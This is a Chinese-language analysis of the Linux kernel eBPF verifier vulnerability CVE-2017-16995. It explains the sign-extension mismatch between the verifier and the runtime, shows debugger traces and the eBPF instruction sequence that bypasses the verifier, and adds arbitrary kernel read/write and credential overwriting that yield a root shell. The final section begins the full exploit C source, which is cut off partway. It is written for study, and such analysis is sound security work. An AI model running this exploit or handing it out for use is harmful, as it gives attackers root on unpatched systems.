Ubuntu kernel eBPF(CVE-2017-16995)

Ubuntu kernel eBPF(CVE-2017-16995)

前言

关于这个漏洞网上已经有很多相关原理的分析,但大多主要以Vitaly Nikolenko的exp来分析,其中涉及了对exp中ebpf字节码进行逆向的问题,对于分析漏洞利用过程并不是十分直观。本篇文章以Bruce Leidl的exp进行分析,个人认为相比前者流程更加清晰直观,便于理解。

环境搭建

本次复现使用Linux_kernel-4.4.33,在编译前开启CONFIG_BPF、CONFIG_BPF_SYSCALL(提供bpf()系统调用)和CONFIG_DEBUG_INFO。

extended BPF

eBPF(extended Berkeley Packet Filter)是内核源自于BPF的一套包过滤机制,eBPF的功能已经不仅仅局限于网络包过滤,利用它可以实现kernel tracing,traffic control,应用性能监控等强大功能。eBPF提供了一套类似RISC的指令集,并实现了该指令集的虚拟机,使用者通过内核API向eBPF提交指令代码来完成特定的功能。

eBPF虚拟指令系统属于RISC,拥有11个虚拟寄存器r0-r10(10个通用寄存器加1个只读的帧指针r10),在实际运行时,虚拟机会把这11个寄存器一一对应于硬件CPU的11个物理寄存器,以x64为例,对应关系如下:

    //R0 - 保存返回值
    //R1-R5 参数传递
    //R6-R9 保存临时变量
    //R10 只读,用做栈指针
    R0 – rax
    R1 - rdi
    R2 - rsi
    R3 - rdx
    R4 - rcx
    R5 - r8
    R6 - rbx
    R7 - r13
    R8 - r14
    R9 - r15
    R10 – rbp(帧指针,frame pointer)

每一条指令的格式如下:

//source/include/uapi/linux/bpf.h#L58
struct bpf_insn {
	__u8	code;		/* opcode */
	__u8	dst_reg:4;	/* dest register */
	__u8	src_reg:4;	/* source register */
	__s16	off;		/* signed offset */
	__s32	imm;		/* signed immediate constant */
};

例如BPF指令:BPF_MOV32_IMM(BPF_REG_9, 0xFFFFFFFF)其数据结构为:

//source/include/linux/filter.h#L124
#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

转换成字节码为:\xb4\x09\x00\x00\xff\xff\xff\xff

可通过如下程序对eBPF字节码进行转换:

[1]https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c

[2]https://github.com/ret2p4nda/kernel-pwn/blob/master/CVE-2017-16995/epbf_tools.py

漏洞分析

简单来说漏洞点是在BPF模拟执行检测时的代码实现和实际运行时的代码实现不同,导致了经过构造的BPF指令绕过检测从而执行恶意代码。

verifier机制绕过

eBPF检测时(do_check() )

我们首先来看如何绕过eBPF的verifier机制,exp中代码如下:

#define BPF_DISABLE_VERIFIER()                                                      \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),            /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),  /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                     /*   exit(0);             */   \
	BPF_EXIT_INSN()                                  /* }                      */   \

第一行的eBPF操作码为BPF_ALU | BPF_MOV | BPF_K,verifier 会对ALU指令用check_alu_op函数进行检查。

该函数调用路径为:

#0  0xffffffff8116719b in check_alu_op (insn=<optimized out>, env=<optimized out>) at kernel/bpf/verifier.c:1097
#1  do_check (env=<optimized out>) at kernel/bpf/verifier.c:1765
#2  bpf_check (prog=<optimized out>, attr=<optimized out>) at kernel/bpf/verifier.c:2258
#3  0xffffffff81163d4e in bpf_prog_load (attr=0xffff88000d94fef0) at kernel/bpf/syscall.c:679
#4  0xffffffff8116456e in SYSC_bpf (size=48, uattr=<optimized out>, cmd=<optimized out>) at kernel/bpf/syscall.c:783
#5  SyS_bpf (cmd=5, uattr=140726845938864, size=72) at kernel/bpf/syscall.c:725
#6  0xffffffff817ef672 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:185

该函数最后一个else是将立即数赋值给寄存器,然而其并没有对BPF_ALU64|BPF_MOV|BPF_K和BPF_ALU|BPF_MOV|BPF_K两个指令做区分,而是直接把用户指令中的立即数insn->imm赋值给了目的寄存器状态中的imm字段,insn->imm和该imm字段的类型都是int。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0x90
 RBX  0xffff88000d950018 ◂— 0
 RCX  0x0
 RDX  0xffffffff
 RDI  0xffff88000d950018 ◂— 0
 RSI  0xffff88000d9500a8 ◂— 8
 R8   0xa
 R9   0xfffc
 R10  0xb
 R11  0xffffc9000009301b ◂— 0xa /* '\n' */
 R12  0x0
 R13  0xffffc90000002028 ◂— 0xffffffff000009b4
 R14  0xb0
 R15  0xffff88000d950000 —▸ 0xffffc90000002000 ◂— 0x2900020001
 RBP  0xffff88000d94fe18 —▸ 0xffff88000d94fed0 —▸ 0xffff88000d94ff48 —▸ 0x7ffd85a99d00 —▸ 0x7ffd85a99d10 ◂— ...
 RSP  0xffff88000d94fd90 ◂— 0xffffffff
 RIP  0xffffffff8116719b (bpf_check+6715) ◂— 0xca870ffffff237e9
──────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff81167187 <bpf_check+6695>    movzx  eax, byte ptr [r13 + 1]
   0xffffffff8116718c <bpf_check+6700>    mov    edx, dword ptr [r13 + 4]
   0xffffffff81167190 <bpf_check+6704>    and    eax, irq_stack_union+15 <15>
   0xffffffff81167193 <bpf_check+6707>    shl    rax, 4 <4>
   0xffffffff81167197 <bpf_check+6711>    mov    dword ptr [rbx + rax + 8], edx
 ► 0xffffffff8116719b <bpf_check+6715>    jmp    bpf_check+3191 <0xffffffff811663d7>
    ↓
   0xffffffff811663d7 <bpf_check+3191>    add    r12d, 1
   0xffffffff811663db <bpf_check+3195>    jmp    bpf_check+2633 <0xffffffff811661a9>
    ↓
   0xffffffff811661a9 <bpf_check+2633>    cmp    dword ptr [rsp + 0x38], r12d
   0xffffffff811661ae <bpf_check+2638>    jle    bpf_check+6091 <0xffffffff81166f2b>
 
   0xffffffff811661b4 <bpf_check+2644>    mov    rax, qword ptr [rsp + 0x30]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/verifier.c
   1091 			}
   1092 		} else {
   1093 			/* case: R = imm
   1094 			 * remember the value we stored into this reg
   1095 			 */
   1096 			regs[insn->dst_reg].type = CONST_IMM;
 ► 1097 			regs[insn->dst_reg].imm = insn->imm;
   1098 		}
   1099 
   1100 	} else if (opcode > BPF_END) {
   1101 		verbose("invalid BPF_ALU opcode %x\n", opcode);
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000d94fd90 ◂— 0xffffffff
01:0008│      0xffff88000d94fd98 ◂— jnp    0xffff88000d94fd3c /* 0xa27b */
02:0010│      0xffff88000d94fda0 ◂— 0x95
03:0018│      0xffff88000d94fda8 ◂— 0
04:0020│      0xffff88000d94fdb0 ◂— add    byte ptr [rax], al /* 0x800000000000 */
05:0028│      0xffff88000d94fdb8 —▸ 0x6be540 ◂— 0
06:0030│      0xffff88000d94fdc0 —▸ 0xffffc90000002028 ◂— 0xffffffff000009b4
07:0038│      0xffff88000d94fdc8 —▸ 0xffff880000000029 ◂— xlatb   /* 0x1ef000d71ef000d7 */
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff8116719b bpf_check+6715
   f 1 ffffffff8116719b bpf_check+6715
   f 2 ffffffff8116719b bpf_check+6715
   f 3 ffffffff81163d4e bpf_prog_load+590
   f 4 ffffffff8116456e sys_bpf+846
   f 5 ffffffff8116456e sys_bpf+846
   f 6 ffffffff817ef672 entry_SYSCALL_64+98
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/10wx $rbx+$rax
0xffff88000d9500a8:	0x00000008	0x00000000	0xffffffff	0x00000000
0xffff88000d9500b8:	0x00000006	0x00000000	0x00000000	0x00000000
0xffff88000d9500c8:	0x00000000	0x00000000

$rbx+$rax处是reg_state结构体类型的reg值,可见第一个字段值为8,第二个字段值为0xffffffff。结构体定义如下:

//kernel/bpf/verifier.c
struct reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == CONST_IMM | PTR_TO_STACK */
        int imm;
        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;
    };
};
//declaration of regs
struct reg_state *regs = state->regs

可以看到该结构体有2个字段,第一个为type,代表寄存器数据的类型,此处为CONST_IMM,CONST_IMM的值为8。另外一个为常量立即数的具体数值,可以看到类型为有符号整型。

do_check()在校验条件类跳转指令的时候,会判断条件是否成立,如果是非确定性跳转的话,就说明接下来2个分支都有可能执行(分支1和分支2),这时do_check()会把下一步需要跳转到的指令编号(分支2)放到一个临时栈中备用,这样当前指令顺序校验(分支1)过程中遇到EXIT指令时,会从临时栈中取出之前保存的下一条指令的序号(分支2)继续校验。如果跳转指令恒成立的话(即直通分支, fall-through branch ),就不会再往临时栈中放入分支2,因为分支2永远不会执行

下面这段代码是对BPF_JMP|BPF_JNE|BPF_K指令进行检查,这条指令的语义是:如果目的寄存器立即数==指令的立即数(insn->imm),程序继续执行,否则执行pc+off处的指令;注意判断立即数相等的条件,因为前面ALU指令对32bit和64bit integer不加区分,不论imm是否有符号,在这里都是相等的。

//kernel/bpf/verifier.c#L1248
static int check_cond_jmp_op(struct verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct reg_state *regs = env->cur_state.regs;
	struct verifier_state *other_branch;
	u8 opcode = BPF_OP(insn->code);
	int err;
    
    ...
        
	/* detect if R == 0 where R was initialized to zero earlier */
	if (BPF_SRC(insn->code) == BPF_K &&
	    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    regs[insn->dst_reg].type == CONST_IMM &&
	    regs[insn->dst_reg].imm == insn->imm) {
		if (opcode == BPF_JEQ) {
			/* if (imm == imm) goto pc+off;
			 * only follow the goto, ignore fall-through
			 */
			*insn_idx += insn->off;
			return 0;
		} else {
			/* if (imm != imm) goto pc+off;
			 * only follow fall-through branch, since
			 * that's where the program will go
			 */
			return 0;
		}
	}
    other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
    ...
}

下面代码,是在校验EXIT指令时,会从临时栈中尝试取指令(调用pop_stack()函数),如果临时栈中有指令,那就说明还有其他可能执行到的分支,需要继续校验,如果取不到值,表示当前这条EXIT指令确实是BPF程序最后一条可以执行到的指令,此时pop_stack()会返回-1,然后跳出do_check校验循环,do_check执行结束,校验通过。

//kernel/bpf/verifier.c#L1921
else if (class == BPF_JMP) {
    u8 opcode = BPF_OP(insn->code);
    ...
    } else if (opcode == BPF_EXIT) {
        if (BPF_SRC(insn->code) != BPF_K ||
            insn->imm != 0 ||
            insn->src_reg != BPF_REG_0 ||
            insn->dst_reg != BPF_REG_0) {
            verbose("BPF_EXIT uses reserved fields\n");
            return -EINVAL;
        }

        /* eBPF calling convetion is such that R0 is used
				 * to return the value from eBPF program.
				 * Make sure that it's readable at this time
				 * of bpf_exit, which means that program wrote
				 * something into it earlier
				 */
        err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
        if (err)
            return err;

        if (is_pointer_value(env, BPF_REG_0)) {
            verbose("R0 leaks addr as return value\n");
            return -EACCES;
        }
process_bpf_exit:
        insn_idx = pop_stack(env, &prev_insn_idx);
        if (insn_idx < 0) {
            break;
        } else {
            do_print_state = true;
            continue;
        }
    } 
	...
}

eBPF运行时(__bpf_prog_run() )

运行第一行操作指令时,将操作码BPF_ALU | BPF_MOV | BPF_K对应为ALU_MOV_K。而64位的操作码BPF_ALU64|BPF_MOV|BPF_K对应为ALU64_MOV_K,定义代码如下:

//kernel/bpf/core.c
static const void *jumptable[256] = {
		[0 ... 255] = &&default_label,
		...
		[BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K,
		...
		[BPF_ALU64 | BPF_MOV | BPF_K] = &&ALU64_MOV_K,
		...
	};
	...
	ALU_MOV_K:
		DST = (u32) IMM;
		CONT;
	...
	ALU64_MOV_K:
		DST = IMM;
		CONT;

可以看出verifier检测时和eBPF运行时代码对于2条指令的语义解释并不一样,DST是64位寄存器,因此ALU_MOV_K得到的是一个32位的无符号整数,而ALU64_MOV_K会对imm进行符号扩展,得到一个64位有符号整数。

eBPF运行时对BPF_JMP|BPF_JNE|BPF_K指令的解释

JMP_JNE_K:
		if (DST != IMM) {
			insn += insn->off;
			CONT_JMP;
		}
		CONT;

imm为有符号和无符号时,由于符号扩展,DST!=IMM结果是不一样的。

动态调试结果如下,可见实际执行时与模拟执行时跳转结果相反,最终执行了verifier未检查的eBPF代码。从而绕过了verifier检测机制。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0x9
 RBX  0xffffc90000002030 ◂— 0xffffffff00020955
 RCX  0x0
 RDX  0xffffffffffffffff
 RDI  0xffff88000d961300 ◂— 0
 RSI  0xffffffff
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0xffff88000d929000 ◂— 0
 R12  0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
 R13  0x0
 R14  0xffff88000d928c00 ◂— 0
 R15  0xffff88000d94fdf0 ◂— 0
 RBP  0xffff88000d94fce0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
 RSP  0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
 RIP  0xffffffff81162d2c (__bpf_prog_run+2028) ◂— 0xfffffd90c5943948
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff811631d0 <__bpf_prog_run+3216>    movzx  eax, byte ptr [rbx]
   0xffffffff811631d3 <__bpf_prog_run+3219>    jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff81162d21 <__bpf_prog_run+2017>    movzx  eax, byte ptr [rbx + 1]
   0xffffffff81162d25 <__bpf_prog_run+2021>    movsxd rdx, dword ptr [rbx + 4]
   0xffffffff81162d29 <__bpf_prog_run+2025>    and    eax, irq_stack_union+15 <15>
 ► 0xffffffff81162d2c <__bpf_prog_run+2028>    cmp    qword ptr [rbp + rax*8 - 0x270], rdx
   0xffffffff81162d34 <__bpf_prog_run+2036>    je     __bpf_prog_run+4992 <0xffffffff811638c0>
 
   0xffffffff81162d3a <__bpf_prog_run+2042>    movsx  rax, word ptr [rbx + 2]
   0xffffffff81162d3f <__bpf_prog_run+2047>    lea    rbx, [rbx + rax*8 + 8]
   0xffffffff81162d44 <__bpf_prog_run+2052>    movzx  eax, byte ptr [rbx]
   0xffffffff81162d47 <__bpf_prog_run+2055>    jmp    qword ptr [r12 + rax*8]
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
   491 			insn += insn->off;
   492 			CONT_JMP;
   493 		}
   494 		CONT;
   495 	JMP_JNE_K:
 ► 496 		if (DST != IMM) {
   497 			insn += insn->off;
   498 			CONT_JMP;
   499 		}
   500 		CONT;
   501 	JMP_JGT_X:
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000d94fa68 —▸ 0xffffea0000365fc0 ◂— 0x1fffff80000000
01:0008│      0xffff88000d94fa70 ◂— 0
02:0010│      0xffff88000d94fa78 —▸ 0xffff88000d961300 ◂— 0
03:0018│      0xffff88000d94fa80 ◂— 0
04:0020│      0xffff88000d94fa88 —▸ 0xffff88000fd5c8d8 ◂— 0xffff88000fd5c8d8
05:0028│      0xffff88000d94fa90 —▸ 0xffff88000fa1a208 —▸ 0xffffea000006f460 —▸ 0xffffea000006f420 —▸ 0xffffea000006f3e0 ◂— ...
06:0030│      0xffff88000d94fa98 —▸ 0xffff88000fd5c780 ◂— 0x1c4
07:0038│      0xffff88000d94faa0 —▸ 0xffff88000d94fd20 —▸ 0xffff88000d94fdc0 —▸ 0xffff88000d94fde0 —▸ 0xffff88000d94fe50 ◂— ...
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff81162d2c __bpf_prog_run+2028
   f 1 ffffffff81700a1b sk_filter+91
   f 2 ffffffff81700a1b sk_filter+91
   f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
   f 4 ffffffff816cec48 sock_sendmsg+56
   f 5 ffffffff816cec48 sock_sendmsg+56
   f 6 ffffffff816cece2 sock_write_iter+130
   f 7 ffffffff811f7f09 __vfs_write+169
   f 8 ffffffff811f7f09 __vfs_write+169
   f 9 ffffffff811f8556 vfs_write+150
   f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/wx $rbp+$rax*8-0x270
0xffff88000d94fab8:	0xffffffff
pwndbg> i r $rdx
rdx            0xffffffffffffffff	-1

组装eBPF指令

在绕过verifier检测机制后,需要组装一个eBPF指令用来做任意地址的读写。

首先来看exp中的实现,如下:

#define BPF_DISABLE_VERIFIER()                                                       \
	BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
	BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
	BPF_EXIT_INSN()                                   /* }                      */   \

#define BPF_MAP_GET(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */              

static int load_prog() {
	struct bpf_insn prog[] = {
		BPF_DISABLE_VERIFIER(),

		BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16),   /* *(fp - 16) = r1       */

		BPF_LD_MAP_FD(BPF_REG_9, mapfd),                   /* r9 = mapfd            */
            
        //可以看出这个MAP的第一个元素为操作指令,第二个元素为需要读写的内存地址,第三个元素用来存放读取到的内容。
		BPF_MAP_GET(0, BPF_REG_6),                         /* r6 = op               */
		BPF_MAP_GET(1, BPF_REG_7),                         /* r7 = address          */
		BPF_MAP_GET(2, BPF_REG_8),                         /* r8 = value            */

		/* store map slot address in r2 */
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0               */
		BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0  for exit(0)   */

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),             /* if (op == 0)          */
		/* get fp */
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),             /* else if (op == 1)     */
		/* get skbuff */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),

		BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3),             /* else if (op == 2)     */
		/* read */
		BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
		BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
		BPF_EXIT_INSN(),
		/* else                  */
		/* write */
		BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), 
		BPF_EXIT_INSN(),

	};
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

之前已经分析过BPF_DISABLE_VERIFIER()的行为,继续往下分析。

首先将rax存入rbp - 0x220处,此处为exp中fp的值。将rdi存入rbp-0x268处,此处为exp中BPF_REG_1的值,并且rdi在源码中的定义为struct sk_buff * skb,这为后面覆写skb->sk->sk_peer_cred提权做铺垫。

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────
 RAX  0xb4
 RBX  0xffffc90000002028 ◂— 0xffffffff000002b4
 RCX  0x0
 RDX  0xffff88000d9fc800 ◂— 0
 RDI  0xffff88000da0e800 ◂— 0
 RSI  0xffffc90000002028 ◂— 0xffffffff000002b4
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0xffff88000d9fc800 ◂— 0
 R12  0xffffffff8182e720 (jumptable) —▸ 0xffffffff81162591 (__bpf_prog_run+81) ◂— 0x488182e700c6c748
 R13  0x0
 R14  0xffff88000d9fc400 ◂— 0
 R15  0xffff88000da0bdf0 ◂— 0
 RBP  0xffff88000da0bce0 —▸ 0xffff88000da0bd20 —▸ 0xffff88000da0bdc0 —▸ 0xffff88000da0bde0 —▸ 0xffff88000da0be50 ◂— ...
 RSP  0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
 RIP  0xffffffff81162577 (__bpf_prog_run+55) ◂— 0xfffffd9085c748
───────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
   0xffffffff8116255c <__bpf_prog_run+28>      xor    r13d, r13d
   0xffffffff8116255f <__bpf_prog_run+31>      sub    rsp, irq_stack_union+608 <0x260>
   0xffffffff81162566 <__bpf_prog_run+38>      mov    qword ptr [rbp - 0x220], rax
   0xffffffff8116256d <__bpf_prog_run+45>      movzx  eax, byte ptr [rsi]
   0xffffffff81162570 <__bpf_prog_run+48>      mov    qword ptr [rbp - 0x268], rdi
 ► 0xffffffff81162577 <__bpf_prog_run+55>      mov    qword ptr [rbp - 0x270], 0
   0xffffffff81162582 <__bpf_prog_run+66>      mov    qword ptr [rbp - 0x238], 0
   0xffffffff8116258d <__bpf_prog_run+77>      jmp    qword ptr [r12 + rax*8]
    ↓
   0xffffffff811631ba <__bpf_prog_run+3194>    movzx  eax, byte ptr [rbx + 1]
   0xffffffff811631be <__bpf_prog_run+3198>    mov    esi, dword ptr [rbx + 4]
   0xffffffff811631c1 <__bpf_prog_run+3201>    add    rbx, 8 <8>
────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────
In file: /home/ivan/kernel/linux-4.4.33/kernel/bpf/core.c
   305 
   306 	FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
   307 	ARG1 = (u64) (unsigned long) ctx;
   308 
   309 	/* Registers used in classic BPF programs need to be reset first. */
 ► 310 	regs[BPF_REG_A] = 0;
   311 	regs[BPF_REG_X] = 0;
   312 
   313 select_insn:
   314 	goto *jumptable[insn->code];
   315 
────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp  0xffff88000da0ba68 —▸ 0xffffea0000368a40 ◂— 0x1fffff80000000
01:0008│      0xffff88000da0ba70 ◂— 0
02:0010│      0xffff88000da0ba78 —▸ 0xffff88000da0e800 ◂— 0
03:0018│      0xffff88000da0ba80 —▸ 0xffff88000d96c770 ◂— 0
04:0020│      0xffff88000da0ba88 —▸ 0xffff88000da0e800 ◂— 0
05:0028│      0xffff88000da0ba90 ◂— 0x158
06:0030│      0xffff88000da0ba98 —▸ 0xffff88000fd07e00 —▸ 0xffff88000fd06780 ◂— 0x1c4
07:0038│      0xffff88000da0baa0 ◂— 1
──────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────
 ► f 0 ffffffff81162577 __bpf_prog_run+55
   f 1 ffffffff81700a1b sk_filter+91
   f 2 ffffffff81700a1b sk_filter+91
   f 3 ffffffff8178d2d5 unix_dgram_sendmsg+501
   f 4 ffffffff816cec48 sock_sendmsg+56
   f 5 ffffffff816cec48 sock_sendmsg+56
   f 6 ffffffff816cece2 sock_write_iter+130
   f 7 ffffffff811f7f09 __vfs_write+169
   f 8 ffffffff811f7f09 __vfs_write+169
   f 9 ffffffff811f8556 vfs_write+150
   f 10 ffffffff811f9156 sys_write+70
───────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/gx $rbp-0x220
0xffff88000da0bac0:	0xffff88000da0bcc8
pwndbg> x/gx 0xffff88000da0bcc8
0xffff88000da0bcc8:	0xffff88000da0e800
pwndbg> x/gx $rbp-0x268
0xffff88000da0ba78:	0xffff88000da0e800

BPF_MAP_GET的主要流程为:(进入宏之前已通过BPF_LD_MAP_FD将mapfd放到r9)将r9放到r1,作为后续调用BPF_FUNC_map_lookup_elem函数的第一个参数;将fp赋值给r2,再令r2 = fp - 4,即在栈上留出4个字节的空间作为key,r2作为第二个参数指向它;将MAP元素的序号(idx)写入fp - 4处;调用BPF_FUNC_map_lookup_elem查找map中序号为idx的元素,并把返回的元素地址存入r0;判断BPF_FUNC_map_lookup_elem是否执行成功(r0是否为0),失败则直接退出;成功后执行宏的最后一条指令,从r0指向的地址读取8字节的值放到目标寄存器(dst)中。

后面定义了四个命令:1.获取fp内核栈地址。2.获取sk_buff地址。3.任意地址读。4.任意地址写。

提权

覆写sk中的sk_peer_cred使其内部与uid相关值置0。由于每个内核版本sk_peer_cred偏移不同,可以先搜索sk_rcvtimeo = 9223372036854775807找到其偏移再减8即为sk_peer_cred的偏移。

pwndbg> p *((struct sk_buff *)0xffff88000da0e800)
$1 = {
  {
    {
      next = 0x0 <irq_stack_union>, 
      prev = 0x0 <irq_stack_union>, 
      {
        tstamp = {
          tv64 = 0
        }, 
        skb_mstamp = {
          {
            v64 = 0, 
            {
              stamp_us = 0, 
              stamp_jiffies = 0
            }
          }
        }
      }
    }, 
    rbnode = {
      __rb_parent_color = 0, 
      rb_right = 0x0 <irq_stack_union>, 
      rb_left = 0x0 <irq_stack_union>
    }
  }, 
  sk = 0xffff88000d9fc400, 
  ...
}
pwndbg> p *((struct sock*)0xffff88000d9fc400)
$2 = {
  ...
  sk_peer_pid = 0xffff88000d96cd00, 
  sk_peer_cred = 0xffff88000d9f9c00, 
  sk_rcvtimeo = 9223372036854775807, 
  sk_sndtimeo = 9223372036854775807, 
  ...
}

运行结果:

/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ ./get-rekt-linux-hardened
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
uid:3e8
[*] Leaking skbuff addr from ffff88000d9f9400
[*] Leaking sock struct from ffff88000da16400
[*] found sock->sk_rcvtimeo at offset 472
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff88000da10780
[*] credentials patched, launching shell...
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)

EXP

完整exp如下:

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

/* Datagram payload that writemsg() writes to sockets[0]. */
char buffer[64];
/* Socket pair created by initialize(); the BPF program is attached to sockets[1]. */
int sockets[2];
/* File descriptors returned by bpf_create_map() and load_prog(). */
int mapfd, progfd;
/* When non-zero, redact() prints a fixed placeholder instead of its message. */
int doredact = 0;

/* Size of the buffer handed to the kernel as attr.log_buf in bpf_prog_load(). */
#define LOG_BUF_SIZE 65536
char bpf_log_buf[LOG_BUF_SIZE];

/*
 * Convert a user-space pointer into the 64-bit integer form that
 * union bpf_attr uses for its pointer-valued fields.
 */
static __u64 ptr_to_u64(void *ptr)
{
	unsigned long raw_addr = (unsigned long) ptr;

	return (__u64) raw_addr;
}

/*
 * Issue the bpf(BPF_PROG_LOAD) system call.
 *
 * prog_type    - program type passed through to the kernel
 * insns        - instruction array
 * prog_len     - size of the instruction array in BYTES (converted to an
 *                instruction count here)
 * license      - NUL-terminated license string
 * kern_version - value stored in attr.kern_version
 *
 * The verifier log is requested at log_level 1 into the global
 * bpf_log_buf, which is reset to an empty string before the call.
 * Returns whatever syscall() returns.
 */
int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version)
{
	union bpf_attr attr = { .prog_type = prog_type };

	attr.insn_cnt = prog_len / sizeof(struct bpf_insn);
	attr.insns = ptr_to_u64((void *) insns);
	attr.license = ptr_to_u64((void *) license);
	attr.log_level = 1;
	attr.log_size = LOG_BUF_SIZE;
	attr.log_buf = ptr_to_u64(bpf_log_buf);
	attr.kern_version = kern_version;

	/* Start from an empty log so stale text is never reported. */
	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Issue the bpf(BPF_MAP_CREATE) system call and return its result.
 *
 * map_flags is accepted for signature compatibility but is not
 * forwarded to the kernel by this wrapper.
 */
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries, int map_flags)
{
	union bpf_attr attr = { .map_type = map_type };
